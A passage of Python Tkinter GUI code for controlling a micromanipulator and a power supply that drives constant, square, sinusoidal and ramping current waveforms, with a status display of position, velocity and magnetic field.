amp = gui_support.ramping_amp.get()
rise_time = gui_support.ramping_rise.get()
steady_time = gui_support.ramping_steady.get()
rest_time = gui_support.ramping_rest.get()
ramp_function = ('(%(amp)f / %(rise_time)f) * t * (step(t) - '
'step(t - %(rise_time)f)) + %(amp)f * '
'(step(t-%(rise_time)f) - step(t - %('
'rise_time)f - %(steady_time)f))') % {
'amp': float(amp),
'rise_time': float(rise_time),
'steady_time': float(steady_time)
}
visualize_wave(
ramp_function, 't',
(0, float(rise_time) + float(steady_time) + float(rest_time)),
MIN_STEP_PERIOD, "Ramping Wave")
def plot_sin():
amp = float(gui_support.sin_amplitude.get())
dc_offset = float(gui_support.sin_offset.get())
period = 1 / float(gui_support.sin_freq.get())
time_offset = 0
sin_function = '%f * sin(2 * pi * (t - %f) / %f) + %f' % (
amp, time_offset, period, dc_offset)
visualize_wave(sin_function, 't', (0, period), MIN_STEP_PERIOD,
"Sine Wave")
# GUI WIDGETS/ELEMENTS FOLLOW
self.MM_Frame = Frame(top)
self.MM_Frame.place(
relx=0.0, rely=0.0, relheight=0.479, relwidth=0.534)
self.MM_Frame.configure(relief=RAISED) # noqa
self.MM_Frame.configure(borderwidth="2")
self.MM_Frame.configure(relief=RAISED) # noqa
self.MM_Frame.configure(width=405)
self.Entry_gtp_x = Entry(self.MM_Frame)
self.Entry_gtp_x.place(
relx=0.049, rely=0.136, height=20, relwidth=0.129)
self.Entry_gtp_x.configure(background="white")
self.Entry_gtp_x.configure(font="TkFixedFont")
self.Entry_gtp_x.configure(selectbackground="#c4c4c4")
self.Entry_gtp_x.configure(textvariable=gui_support.gtp_x)
self.Label_Manipulator = Label(self.MM_Frame, anchor='w')
self.Label_Manipulator.place(
relx=0.049, rely=0.034, height=28, width=150)
self.Label_Manipulator.configure(activebackground="#f9f9f9")
self.Label_Manipulator.configure(font=font9)
self.Label_Manipulator.configure(text='''Micromanipulator''')
self.Entry_gtp_y = Entry(self.MM_Frame)
self.Entry_gtp_y.place(
relx=0.181, rely=0.136, height=20, relwidth=0.129)
self.Entry_gtp_y.configure(background="white")
self.Entry_gtp_y.configure(font="TkFixedFont")
self.Entry_gtp_y.configure(selectbackground="#c4c4c4")
self.Entry_gtp_y.configure(textvariable=gui_support.gtp_y)
self.Entry_gtp_z = Entry(self.MM_Frame)
self.Entry_gtp_z.place(
relx=0.311, rely=0.136, height=20, relwidth=0.129)
self.Entry_gtp_z.configure(background="white")
self.Entry_gtp_z.configure(font="TkFixedFont")
self.Entry_gtp_z.configure(selectbackground="#c4c4c4")
self.Entry_gtp_z.configure(textvariable=gui_support.gtp_z)
self.Button_gtp = Button(self.MM_Frame, command=lambda: gtp())
self.Button_gtp.place(relx=0.049, rely=0.211, height=26, width=149)
self.Button_gtp.configure(activebackground="#d9d9d9")
self.Button_gtp.configure(text='''Go To Position (um)''')
self.Listbox_pos = Listbox(self.MM_Frame)
self.Listbox_pos.place(
relx=0.494, rely=0.068, relheight=0.217, relwidth=0.479)
self.Listbox_pos.configure(background="white")
self.Listbox_pos.configure(font="TkFixedFont")
self.Listbox_pos.configure(selectmode='single')
self.Listbox_pos.configure(width=194)
self.Button_goto = Button(self.MM_Frame, command=lambda: go_to())
self.Button_goto.place(relx=0.519, rely=0.305, height=26, width=62)
self.Button_goto.configure(activebackground="#d9d9d9")
self.Button_goto.configure(text='''Go To''')
self.Button_delete = Button(self.MM_Frame, command=lambda: delete())
self.Button_delete.place(relx=0.716, rely=0.305, height=26, width=62)
self.Button_delete.configure(activebackground="#d9d9d9")
self.Button_delete.configure(text='''Delete''')
self.Button_step_x = Button(self.MM_Frame, command=lambda: step_x())
self.Button_step_x.place(relx=0.198, rely=0.508, height=26, width=32)
self.Button_step_x.configure(activebackground="#d9d9d9")
self.Button_step_x.configure(text='''x''')
self.Label_step = Label(self.MM_Frame, anchor='w')
self.Label_step.place(relx=0.049, rely=0.441, height=18, width=66)
self.Label_step.configure(activebackground="#f9f9f9")
self.Label_step.configure(text='''Step (um)''')
self.Button_step_y = Button(self.MM_Frame, command=lambda: step_y())
self.Button_step_y.place(relx=0.198, rely=0.61, height=26, width=32)
self.Button_step_y.configure(activebackground="#d9d9d9")
self.Button_step_y.configure(text='''y''')
self.Button_step_z = Button(self.MM_Frame, command=lambda: step_z())
self.Button_step_z.place(relx=0.198, rely=0.712, height=26, width=32)
self.Button_step_z.configure(activebackground="#d9d9d9")
self.Button_step_z.configure(text='''z''')
self.Button_save_pos = Button(
self.MM_Frame, command=lambda: save_pos())
self.Button_save_pos.place(
relx=0.049, rely=0.305, height=26, width=145)
self.Button_save_pos.configure(activebackground="#d9d9d9")
self.Button_save_pos.configure(text='''Save Present Position''')
self.Button_velocity = Button(
self.MM_Frame, command=lambda: change_velocity())
self.Button_velocity.place(
relx=0.444, rely=0.475, height=26, width=118)
self.Button_velocity.configure(activebackground="#d9d9d9")
self.Button_velocity.configure(text='''Velocity (um/s)''')
self.Entry_velocity = Entry(self.MM_Frame)
self.Entry_velocity.place(
relx=0.765, rely=0.475, height=20, relwidth=0.138)
self.Entry_velocity.configure(background="white")
self.Entry_velocity.configure(font="TkFixedFont")
self.Entry_velocity.configure(selectbackground="#c4c4c4")
self.Entry_velocity.configure(textvariable=gui_support.velocity)
self.Spinbox_step_x = Spinbox(self.MM_Frame, from_=-50.0, to=50.0)
self.Spinbox_step_x.place(
relx=0.049, rely=0.508, relheight=0.068, relwidth=0.134)
self.Spinbox_step_x.configure(activebackground="#f9f9f9")
self.Spinbox_step_x.configure(background="white")
self.Spinbox_step_x.configure(highlightbackground="black")
self.Spinbox_step_x.configure(selectbackground="#c4c4c4")
self.Spinbox_step_x.configure(textvariable=gui_support.step_x)
self.Spinbox_step_z = Spinbox(self.MM_Frame, from_=-50.0, to=50.0)
self.Spinbox_step_z.place(
relx=0.049, rely=0.712, relheight=0.068, relwidth=0.134)
self.Spinbox_step_z.configure(activebackground="#f9f9f9")
self.Spinbox_step_z.configure(background="white")
self.Spinbox_step_z.configure(highlightbackground="black")
self.Spinbox_step_z.configure(selectbackground="#c4c4c4")
self.Spinbox_step_z.configure(textvariable=gui_support.step_z)
self.Spinbox_step_y = Spinbox(self.MM_Frame, from_=-50.0, to=50.0)
self.Spinbox_step_y.place(
relx=0.049, rely=0.61, relheight=0.068, relwidth=0.134)
self.Spinbox_step_y.configure(activebackground="#f9f9f9")
self.Spinbox_step_y.configure(background="white")
self.Spinbox_step_y.configure(highlightbackground="black")
self.Spinbox_step_y.configure(selectbackground="#c4c4c4")
self.Spinbox_step_y.configure(textvariable=gui_support.step_y)
self.Radiobutton_highres = Radiobutton(
self.MM_Frame, command=lambda: change_resolution())
self.Radiobutton_highres.place(
relx=0.42, rely=0.576, relheight=0.068, relwidth=0.469)
self.Radiobutton_highres.configure(activebackground="#d9d9d9")
self.Radiobutton_highres.configure(justify=LEFT) # noqa
self.Radiobutton_highres.configure(
text='''High Resolution (0.4um/s)''')
self.Radiobutton_highres.configure(value="low")
self.Radiobutton_highres.configure(
variable=gui_support.radio_resolution)
self.Radiobutton_lowres = Radiobutton(
self.MM_Frame, command=lambda: change_resolution())
self.Radiobutton_lowres.place(
relx=0.43, rely=0.644, relheight=0.068, relwidth=0.415)
self.Radiobutton_lowres.configure(activebackground="#d9d9d9")
self.Radiobutton_lowres.configure(justify=LEFT) # noqa
self.Radiobutton_lowres.configure(text='''Low Resolution (2um/s)''')
self.Radiobutton_lowres.configure(value="high")
self.Radiobutton_lowres.configure(
variable=gui_support.radio_resolution)
self.Button_mm_interrupt = Button(
self.MM_Frame, command=lambda: mm_interupt())
self.Button_mm_interrupt.place(
relx=0.642, rely=0.705, height=36, width=131)
self.Button_mm_interrupt.configure(activebackground="#d80000")
self.Button_mm_interrupt.configure(background="#d80000")
self.Button_mm_interrupt.configure(font=font10)
self.Button_mm_interrupt.configure(state=ACTIVE) # noqa
self.Button_mm_interrupt.configure(text='''Interrupt''')
self.Button_mm_interrupt.configure(width=131)
# self.Radiobutton_absolute = Radiobutton(self.MM_Frame)
# self.Radiobutton_absolute.place(relx=0.444,
# rely=0.136,
# relheight=0.068,
# relwidth=0.205)
# self.Radiobutton_absolute.configure(activebackground="#d9d9d9")
# self.Radiobutton_absolute.configure(justify='left')
# self.Radiobutton_absolute.configure(text='''Absolute''')
# self.Radiobutton_absolute.configure(value="absolute")
# self.Radiobutton_absolute.configure(variable=gui_support.radio_pos_mode)
# self.Radiobutton_relative = Radiobutton(self.MM_Frame)
# self.Radiobutton_relative.place(relx=0.444,
# rely=0.203,
# relheight=0.068,
# relwidth=0.19)
# self.Radiobutton_relative.configure(activebackground="#d9d9d9")
# self.Radiobutton_relative.configure(justify='left')
# self.Radiobutton_relative.configure(text='''Relative''')
# self.Radiobutton_relative.configure(value="relative")
# self.Radiobutton_relative.configure(variable=gui_support.radio_pos_mode)
self.Label_pathing = Label(self.MM_Frame)
self.Label_pathing.place(relx=0.049, rely=0.8, height=18, width=110)
self.Label_pathing.configure(activebackground="#f9f9f9")
self.Label_pathing.configure(text='''Pathing Function''')
self.Entry_path_x = Entry(self.MM_Frame)
self.Entry_path_x.place(
relx=0.049, rely=0.868, height=20, relwidth=0.114)
self.Entry_path_x.configure(background="white")
self.Entry_path_x.configure(font="TkFixedFont")
self.Entry_path_x.configure(selectbackground="#c4c4c4")
self.Entry_path_x.configure(textvariable=gui_support.path_x)
self.Entry_path_y = Entry(self.MM_Frame)
self.Entry_path_y.place(
relx=0.172, rely=0.868, height=20, relwidth=0.114)
self.Entry_path_y.configure(background="white")
self.Entry_path_y.configure(font="TkFixedFont")
self.Entry_path_y.configure(selectbackground="#c4c4c4")
self.Entry_path_y.configure(textvariable=gui_support.path_y)
self.Entry_path_z = Entry(self.MM_Frame)
self.Entry_path_z.place(
relx=0.296, rely=0.868, height=20, relwidth=0.114)
self.Entry_path_z.configure(background="white")
self.Entry_path_z.configure(font="TkFixedFont")
self.Entry_path_z.configure(selectbackground="#c4c4c4")
self.Entry_path_z.configure(textvariable=gui_support.path_z)
self.Entry_path_min = Entry(self.MM_Frame)
self.Entry_path_min.place(
relx=0.419, rely=0.868, height=20, relwidth=0.114)
self.Entry_path_min.configure(background="white")
self.Entry_path_min.configure(font="TkFixedFont")
self.Entry_path_min.configure(selectbackground="#c4c4c4")
self.Entry_path_min.configure(textvariable=gui_support.path_min)
self.Entry_path_max = Entry(self.MM_Frame)
self.Entry_path_max.place(
relx=0.543, rely=0.868, height=20, relwidth=0.114)
self.Entry_path_max.configure(background="white")
self.Entry_path_max.configure(font="TkFixedFont")
self.Entry_path_max.configure(selectbackground="#c4c4c4")
self.Entry_path_max.configure(textvariable=gui_support.path_max)
self.Label_path_x = Label(self.MM_Frame)
self.Label_path_x.place(relx=0.049, rely=0.932, height=18, width=22)
self.Label_path_x.configure(anchor='w')
self.Label_path_x.configure(text='''x''')
self.Label_path_x.configure(width=22)
self.Label_path_y = Label(self.MM_Frame)
self.Label_path_y.place(relx=0.197, rely=0.932, height=18, width=22)
self.Label_path_y.configure(activebackground="#f9f9f9")
self.Label_path_y.configure(anchor='w')
self.Label_path_y.configure(text='''y''')
self.Label_path_z = Label(self.MM_Frame)
self.Label_path_z.place(relx=0.320, rely=0.932, height=18, width=22)
self.Label_path_z.configure(activebackground="#f9f9f9")
self.Label_path_z.configure(anchor='w')
self.Label_path_z.configure(text='''z''')
self.Label_path_bound = Label(self.MM_Frame)
self.Label_path_bound.place(
relx=0.419, rely=0.932, height=18, width=132)
self.Label_path_bound.configure(activebackground="#f9f9f9")
self.Label_path_bound.configure(anchor='w')
self.Label_path_bound.configure(text='''min and max bound''')
self.Label_path_bound.configure(width=132)
self.Button_path = Button(self.MM_Frame)
self.Button_path.place(relx=0.666, rely=0.853, height=26, width=43)
self.Button_path.configure(activebackground="#d9d9d9")
self.Button_path.configure(text='''Go''')
self.Current_Frame = Frame(top)
self.Current_Frame.place(
relx=0.0, rely=0.487, relheight=0.5, relwidth=0.534)
self.Current_Frame.configure(relief=RAISED) # noqa
self.Current_Frame.configure(borderwidth="2")
self.Current_Frame.configure(relief=RAISED) # noqa
self.Current_Frame.configure(width=405)
self.Label_ps = Label(self.Current_Frame, anchor='w')
self.Label_ps.place(relx=0.025, rely=0.031, height=23, width=190)
self.Label_ps.configure(activebackground="#f9f9f9")
self.Label_ps.configure(font=font9)
self.Label_ps.configure(text='''Power Supply''')
self.Button_ps_interrupt = Button(
self.Current_Frame, command=lambda: supply_interupt())
self.Button_ps_interrupt.place(
relx=0.642, rely=0.842, height=36, width=131)
self.Button_ps_interrupt.configure(activebackground="#d80000")
self.Button_ps_interrupt.configure(background="#d80000")
self.Button_ps_interrupt.configure(font=font10)
self.Button_ps_interrupt.configure(state=ACTIVE) # noqa
self.Button_ps_interrupt.configure(text='''Interrupt''')
self.Button_ps_interrupt.configure(width=131)
self.style.configure('TNotebook.Tab', background=_bgcolor)
self.style.configure('TNotebook.Tab', foreground=_fgcolor)
self.style.map(
'TNotebook.Tab',
background=[('selected', _compcolor), ('active', _ana2color)])
self.Notebook_ps = ttk.Notebook(self.Current_Frame)
self.Notebook_ps.place(
relx=0.025, rely=0.14, relheight=0.625, relwidth=0.919)
self.Notebook_ps.configure(width=372)
self.Notebook_ps.configure(takefocus="")
self.Notebook_ps_t0 = Frame(self.Notebook_ps)
self.Notebook_ps.add(self.Notebook_ps_t0, padding=3)
self.Notebook_ps.tab(
0,
text="Constant",
compound="left",
underline="-1",
)
self.Notebook_ps_t1 = Frame(self.Notebook_ps)
self.Notebook_ps.add(self.Notebook_ps_t1, padding=3)
self.Notebook_ps.tab(
1,
text="Square",
compound="left",
underline="-1",
)
self.Notebook_ps_t2 = Frame(self.Notebook_ps)
self.Notebook_ps.add(self.Notebook_ps_t2, padding=3)
self.Notebook_ps.tab(
2,
text="Sinusoidal",
compound="left",
underline="-1",
)
self.Notebook_ps_t3 = Frame(self.Notebook_ps)
self.Notebook_ps.add(self.Notebook_ps_t3, padding=3)
self.Notebook_ps.tab(
3,
text="Ramping",
compound="none",
underline="-1",
)
self.Label_constant_amps = Label(self.Notebook_ps_t0, anchor='w')
self.Label_constant_amps.place(
relx=0.027, rely=0.071, height=18, width=92)
self.Label_constant_amps.configure(activebackground="#f9f9f9")
self.Label_constant_amps.configure(text='''Amperes (A)''')
self.Entry_constant_amps = Entry(self.Notebook_ps_t0)
self.Entry_constant_amps.place(
relx=0.297, rely=0.071, height=20, relwidth=0.178)
self.Entry_constant_amps.configure(background="white")
self.Entry_constant_amps.configure(font="TkFixedFont")
self.Entry_constant_amps.configure(selectbackground="#c4c4c4")
self.Entry_constant_amps.configure(
textvariable=gui_support.constant_amps)
self.Label_constant_duration = Label(self.Notebook_ps_t0, anchor='w')
self.Label_constant_duration.place(
relx=0.027, rely=0.214, height=18, width=79)
self.Label_constant_duration.configure(activebackground="#f9f9f9")
self.Label_constant_duration.configure(text='''Run Time (s)''')
self.Entry_constant_duration = Entry(self.Notebook_ps_t0)
self.Entry_constant_duration.place(
relx=0.297, rely=0.214, height=20, relwidth=0.178)
self.Entry_constant_duration.configure(background="white")
self.Entry_constant_duration.configure(font="TkFixedFont")
self.Entry_constant_duration.configure(selectbackground="#c4c4c4")
self.Entry_constant_duration.configure(
textvariable=gui_support.constant_duration)
self.Button_constant_run = Button(
self.Notebook_ps_t0, command=lambda: constant_run())
self.Button_constant_run.place(
relx=0.027, rely=0.429, height=26, width=50)
self.Button_constant_run.configure(activebackground="#d9d9d9")
self.Button_constant_run.configure(text='''Run''')
self.Label_square_amp = Label(self.Notebook_ps_t1, anchor='w')
self.Label_square_amp.place(
relx=0.027, rely=0.071, height=18, width=99)
self.Label_square_amp.configure(activebackground="#f9f9f9")
self.Label_square_amp.configure(text='''Amplitude (A)''')
self.Entry_square_amp = Entry(self.Notebook_ps_t1)
self.Entry_square_amp.place(
relx=0.324, rely=0.071, height=20, relwidth=0.178)
self.Entry_square_amp.configure(background="white")
self.Entry_square_amp.configure(font="TkFixedFont")
self.Entry_square_amp.configure(selectbackground="#c4c4c4")
self.Entry_square_amp.configure(textvariable=gui_support.square_amp)
self.Label_square_duration = Label(self.Notebook_ps_t1, anchor='w')
self.Label_square_duration.place(
relx=0.027, rely=0.214, height=18, width=79)
self.Label_square_duration.configure(activebackground="#f9f9f9")
self.Label_square_duration.configure(text='''Run Time (s)''')
self.Entry_square_duration = Entry(self.Notebook_ps_t1)
self.Entry_square_duration.place(
relx=0.324, rely=0.214, height=20, relwidth=0.178)
self.Entry_square_duration.configure(background="white")
self.Entry_square_duration.configure(font="TkFixedFont")
self.Entry_square_duration.configure(selectbackground="#c4c4c4")
self.Entry_square_duration.configure(
textvariable=gui_support.square_duration)
self.Label_square_duty = Label(self.Notebook_ps_t1, anchor='w')
self.Label_square_duty.place(
relx=0.027, rely=0.357, height=18, width=93)
self.Label_square_duty.configure(activebackground="#f9f9f9")
self.Label_square_duty.configure(text='''Duty Cycle (%)''')
self.Entry_square_duty = Entry(self.Notebook_ps_t1)
self.Entry_square_duty.place(
relx=0.324, rely=0.357, height=20, relwidth=0.178)
self.Entry_square_duty.configure(background="white")
self.Entry_square_duty.configure(font="TkFixedFont")
self.Entry_square_duty.configure(selectbackground="#c4c4c4")
self.Entry_square_duty.configure(textvariable=gui_support.square_duty)
self.Label_square_freq = Label(self.Notebook_ps_t1, anchor='w')
self.Label_square_freq.place(relx=0.027, rely=0.5, height=18, width=97)
self.Label_square_freq.configure(activebackground="#f9f9f9")
self.Label_square_freq.configure(text='''Frequency (Hz)''')
self.Entry_square_freq = Entry(self.Notebook_ps_t1)
self.Entry_square_freq.place(
relx=0.324, rely=0.5, height=20, relwidth=0.178)
self.Entry_square_freq.configure(background="white")
self.Entry_square_freq.configure(font="TkFixedFont")
self.Entry_square_freq.configure(selectbackground="#c4c4c4")
self.Entry_square_freq.configure(textvariable=gui_support.square_freq)
self.Button_square_run = Button(
self.Notebook_ps_t1, command=lambda: square_run())
self.Button_square_run.place(
relx=0.027, rely=0.714, height=26, width=50)
self.Button_square_run.configure(activebackground="#d9d9d9")
self.Button_square_run.configure(text='''Run''')
self.Button_square_plot = Button(
self.Notebook_ps_t1, command=lambda: plot_square())
self.Button_square_plot.place(
relx=0.227, rely=0.714, height=26, width=125)
self.Button_square_plot.configure(activebackground="#d9d9d9")
self.Button_square_plot.configure(text='''Show Waveform''')
self.Entry_sin_freq = Entry(self.Notebook_ps_t2)
self.Entry_sin_freq.place(
relx=0.324, rely=0.357, height=20, relwidth=0.178)
self.Entry_sin_freq.configure(background="white")
self.Entry_sin_freq.configure(font="TkFixedFont")
self.Entry_sin_freq.configure(selectbackground="#c4c4c4")
self.Entry_sin_freq.configure(textvariable=gui_support.sin_freq)
self.Label_sin_freq = Label(self.Notebook_ps_t2, anchor='w')
self.Label_sin_freq.place(relx=0.027, rely=0.357, height=18, width=97)
self.Label_sin_freq.configure(activebackground="#f9f9f9")
self.Label_sin_freq.configure(text='''Frequency (Hz)''')
self.Label_sin_amp = Label(self.Notebook_ps_t2, anchor='w')
self.Label_sin_amp.place(relx=0.027, rely=0.071, height=18, width=99)
self.Label_sin_amp.configure(activebackground="#f9f9f9")
self.Label_sin_amp.configure(text='''Amplitude (A)''')
self.Entry_sin_amplitude = Entry(self.Notebook_ps_t2)
self.Entry_sin_amplitude.place(
relx=0.324, rely=0.071, height=20, relwidth=0.178)
self.Entry_sin_amplitude.configure(background="white")
self.Entry_sin_amplitude.configure(font="TkFixedFont")
self.Entry_sin_amplitude.configure(selectbackground="#c4c4c4")
self.Entry_sin_amplitude.configure(
textvariable=gui_support.sin_amplitude)
self.Label_sin_offset = Label(self.Notebook_ps_t2, anchor='w')
self.Label_sin_offset.place(
relx=0.027, rely=0.214, height=18, width=74)
self.Label_sin_offset.configure(activebackground="#f9f9f9")
self.Label_sin_offset.configure(text='''Offset (A)''')
self.Entry_sin_offset = Entry(self.Notebook_ps_t2)
self.Entry_sin_offset.place(
relx=0.324, rely=0.214, height=20, relwidth=0.178)
self.Entry_sin_offset.configure(background="white")
self.Entry_sin_offset.configure(font="TkFixedFont")
self.Entry_sin_offset.configure(selectbackground="#c4c4c4")
self.Entry_sin_offset.configure(textvariable=gui_support.sin_offset)
self.Label_sin_duration = Label(self.Notebook_ps_t2, anchor='w')
self.Label_sin_duration.place(
relx=0.027, rely=0.5, height=18, width=79)
self.Label_sin_duration.configure(activebackground="#f9f9f9")
self.Label_sin_duration.configure(text='''Run Time (s)''')
self.Entry_sin_duration = Entry(self.Notebook_ps_t2)
self.Entry_sin_duration.place(
relx=0.324, rely=0.5, height=20, relwidth=0.178)
self.Entry_sin_duration.configure(background="white")
self.Entry_sin_duration.configure(font="TkFixedFont")
self.Entry_sin_duration.configure(selectbackground="#c4c4c4")
self.Entry_sin_duration.configure(
textvariable=gui_support.sin_duration)
self.Button_sin_run = Button(
self.Notebook_ps_t2, command=lambda: sinusoidal_run())
self.Button_sin_run.place(relx=0.027, rely=0.714, height=26, width=50)
self.Button_sin_run.configure(activebackground="#d9d9d9")
self.Button_sin_run.configure(text='''Run''')
self.Button_sin_plot = Button(
self.Notebook_ps_t2, command=lambda: plot_sin())
self.Button_sin_plot.place(
relx=0.227, rely=0.714, height=26, width=125)
self.Button_sin_plot.configure(activebackground="#d9d9d9")
self.Button_sin_plot.configure(text='''Show Waveform''')
self.Label_ramping_amp = Label(self.Notebook_ps_t3, anchor='w')
self.Label_ramping_amp.place(
relx=0.027, rely=0.071, height=18, width=99)
self.Label_ramping_amp.configure(text='''Amplitude (A)''')
self.Label_ramping_rise = Label(self.Notebook_ps_t3, anchor='w')
self.Label_ramping_rise.place(
relx=0.027, rely=0.214, height=18, width=84)
self.Label_ramping_rise.configure(text='''Rise Time (s)''')
self.Label_ramping_steady = Label(self.Notebook_ps_t3, anchor='w')
self.Label_ramping_steady.place(
relx=0.027, rely=0.357, height=18, width=101)
self.Label_ramping_steady.configure(text='''Steady Time (s)''')
self.Label_ramping_rest = Label(self.Notebook_ps_t3, anchor='w')
self.Label_ramping_rest.place(
relx=0.027, rely=0.5, height=18, width=86)
self.Label_ramping_rest.configure(text='''Rest Time (s)''')
self.Label_ramping_duration = Label(self.Notebook_ps_t3, anchor='w')
self.Label_ramping_duration.place(
relx=0.027, rely=0.643, height=18, width=86)
self.Label_ramping_duration.configure(text='''Run Time (s)''')
self.Entry_ramping_amp = Entry(self.Notebook_ps_t3)
self.Entry_ramping_amp.place(
relx=0.324, rely=0.071, height=20, relwidth=0.178)
self.Entry_ramping_amp.configure(background="white")
self.Entry_ramping_amp.configure(font="TkFixedFont")
self.Entry_ramping_amp.configure(textvariable=gui_support.ramping_amp)
self.Entry_ramping_amp.configure(width=66)
self.Entry_ramping_rise = Entry(self.Notebook_ps_t3)
self.Entry_ramping_rise.place(
relx=0.324, rely=0.214, height=20, relwidth=0.178)
self.Entry_ramping_rise.configure(background="white")
self.Entry_ramping_rise.configure(font="TkFixedFont")
self.Entry_ramping_rise.configure(
textvariable=gui_support.ramping_rise)
self.Entry_ramping_rise.configure(width=66)
self.Entry_ramping_steady = Entry(self.Notebook_ps_t3)
self.Entry_ramping_steady.place(
relx=0.324, rely=0.357, height=20, relwidth=0.178)
self.Entry_ramping_steady.configure(background="white")
self.Entry_ramping_steady.configure(font="TkFixedFont")
self.Entry_ramping_steady.configure(
textvariable=gui_support.ramping_steady)
self.Entry_ramping_steady.configure(width=66)
self.Entry_ramping_rest = Entry(self.Notebook_ps_t3)
self.Entry_ramping_rest.place(
relx=0.324, rely=0.5, height=20, relwidth=0.178)
self.Entry_ramping_rest.configure(background="white")
self.Entry_ramping_rest.configure(font="TkFixedFont")
self.Entry_ramping_rest.configure(
textvariable=gui_support.ramping_rest)
self.Entry_ramping_rest.configure(width=66)
self.Entry_ramping_duration = Entry(self.Notebook_ps_t3)
self.Entry_ramping_duration.place(
relx=0.324, rely=0.643, height=20, relwidth=0.178)
self.Entry_ramping_duration.configure(background="white")
self.Entry_ramping_duration.configure(font="TkFixedFont")
self.Entry_ramping_duration.configure(
textvariable=gui_support.ramping_duration)
self.Entry_ramping_duration.configure(width=66)
self.Button_ramping_run = Button(
self.Notebook_ps_t3, command=lambda: ramping_run())
self.Button_ramping_run.place(
relx=0.027, rely=0.857, height=26, width=50)
self.Button_ramping_run.configure(activebackground="#d9d9d9")
self.Button_ramping_run.configure(text='''Run''')
self.Button_ramping_plot = Button(
self.Notebook_ps_t3, command=lambda: plot_ramping())
self.Button_ramping_plot.place(
relx=0.227, rely=0.857, height=26, width=125)
self.Button_ramping_plot.configure(activebackground="#d9d9d9")
self.Button_ramping_plot.configure(text='''Show Waveform''')
self.Button_stop = Button(self.Current_Frame, command=lambda: stop())
self.Button_stop.place(relx=0.025, rely=0.850, height=26, width=170)
self.Button_stop.configure(activebackground="#d9d9d9")
self.Button_stop.configure(text='''Stop Power Supply Output''')
self.Status_Frame = Frame(top)
self.Status_Frame.place(
relx=0.541, rely=0.0, relheight=0.735, relwidth=0.455)
self.Status_Frame.configure(relief=RAISED) # noqa
self.Status_Frame.configure(borderwidth="2")
self.Status_Frame.configure(relief=RAISED) # noqa
self.Status_Frame.configure(width=345)
self.Label_status = Label(self.Status_Frame, anchor='w')
self.Label_status.place(relx=0.029, rely=0.019, height=23, width=60)
self.Label_status.configure(activebackground="#f9f9f9")
self.Label_status.configure(font=font9)
self.Label_status.configure(text='''Status''')
# self.Label_status_relpos = Label(self.Status_Frame, anchor='w')
# self.Label_status_relpos.place(relx=0.058,
# rely=0.076,
# height=18,
# width=144)
# self.Label_status_relpos.configure(activebackground="#f9f9f9")
# relpost_text = '''Relative Position (um)'''
# self.Label_status_relpos.configure(text=relpost_text)
self.Label_status_abspos = Label(self.Status_Frame, anchor='w')
self.Label_status_abspos.place(
relx=0.058, rely=0.114, height=18, width=100)
self.Label_status_abspos.configure(text='''Position (um):''')
self.Label_status_abspos_v = Label(self.Status_Frame, anchor='w')
self.Label_status_abspos_v.place(
relx=0.4, rely=0.114, height=18, width=175)
self.Label_status_abspos_v.configure(text='''Value''')
self.Label_status_abspos_v.configure(
textvariable=gui_support.status_abspos_v)
self.Label_status_res = Label(self.Status_Frame, anchor='w')
self.Label_status_res.place(relx=0.058, rely=0.19, height=18, width=74)
self.Label_status_res.configure(activebackground="#f9f9f9")
self.Label_status_res.configure(text='''Resolution:''')
self.Label_status_vel = Label(self.Status_Frame, anchor='w')
self.Label_status_vel.place(
relx=0.058, rely=0.152, height=18, width=100)
self.Label_status_vel.configure(activebackground="#f9f9f9")
self.Label_status_vel.configure(text='''Velocity (um/s):''')
self.Label_status_magfield = Label(self.Status_Frame, anchor='w')
self.Label_status_magfield.place(
relx=0.058, rely=0.229, height=18, width=98)
self.Label_status_magfield.configure(activebackground="#f9f9f9")
self.Label_status_magfield.configure(text='''Magnetic Field:''')
self.Label_console = Label(self.Status_Frame, anchor='w')
self.Label_console.place(relx=0.058, rely=0.59, height=18, width=101)
self.Label_console.configure(activebackground="#f9f9f9")
self.Label_console.configure(text='''Console Output''')
# self.Label_status_relpos_v = Label(self.Status_Frame, anchor='w')
# self.Label_status_relpos_v.place(relx=0.493,
# rely=0.076,
# height=18,
# width=160)
# self.Label_status_relpos_v.configure(activebackground="#f9f9f9")
# self.Label_status_relpos_v.configure(justify=LEFT)
# self.Label_status_relpos_v.configure(text='''Value''')
# self.Label_status_relpos_v.configure(textvariable=gui_support.status_relpos_v)
# self.Label_status_relpos_v.configure(width=89)
self.Label_status_vel_v = Label(self.Status_Frame, anchor='w')
self.Label_status_vel_v.place(
relx=0.377, rely=0.152, height=18, width=39)
self.Label_status_vel_v.configure(activebackground="#f9f9f9")
self.Label_status_vel_v.configure(justify=LEFT) # noqa
self.Label_status_vel_v.configure(text='''Value''')
self.Label_status_vel_v.configure(
textvariable=gui_support.status_vel_v)
self.Label_status_res_v = Label(self.Status_Frame, anchor='w')
self.Label_status_res_v.place(
relx=0.319, rely=0.19, height=18, width=90)
self.Label_status_res_v.configure(activebackground="#f9f9f9")
self.Label_status_res_v.configure(justify=LEFT) # noqa
self.Label_status_res_v.configure(text='''Value''')
self.Label_status_res_v.configure(
textvariable=gui_support.status_res_v)
self.Label_status_magfield_v = Label(self.Status_Frame, anchor='w')
self.Label_status_magfield_v.place(
relx=0.377, rely=0.229, height=18, width=39)
self.Label_status_magfield_v.configure(activebackground="#f9f9f9")
self.Label_status_magfield_v.configure(justify=LEFT) # noqa
self.Label_status_magfield_v.configure(text='''Value''')
self.Label_status_magfield_v.configure(
textvariable=gui_support.status_magfield_v)
self.Label_status_current = Label(self.Status_Frame)
self.Label_status_current.place(
relx=0.058, rely=0.307, height=18, width=77)
self.Label_status_current.configure(anchor='w')
self.Label_status_current.configure(text='''Current (A):''')
self.Label_status_current_v = Label(self.Status_Frame)
self.Label_status_current_v.place(
relx=0.319, rely=0.307, height=18, width=97)
self.Label_status_current_v.configure(anchor='w')
self.Label_status_current_v.configure(text='''Value''')
self.Label_status_current_v.configure(
textvariable=gui_support.status_current_v)
self.Label_status_current_v.configure(width=97)
self.Label_status_wave = Label(self.Status_Frame)
self.Label_status_wave.place(
relx=0.058, rely=0.268, height=18, width=69)
self.Label_status_wave.configure(anchor='w')
self.Label_status_wave.configure(text='''Waveform:''')
self.Label_status_wave_v = Label(self.Status_Frame)
self.Label_status_wave_v.place(
relx=0.329, rely=0.268, height=18, width=107)
self.Label_status_wave_v.configure(anchor='w')
self.Label_status_wave_v.configure(text='''Value''')
self.Label_status_wave_v.configure(
textvariable=gui_support.status_wave_v)
self.Label_status_wave_v.configure(width=107)
self.Label_status_duration = Label(self.Status_Frame)
self.Label_status_duration.place(
relx=0.058, rely=0.346, height=18, width=83)
self.Label_status_duration.configure(anchor='w')
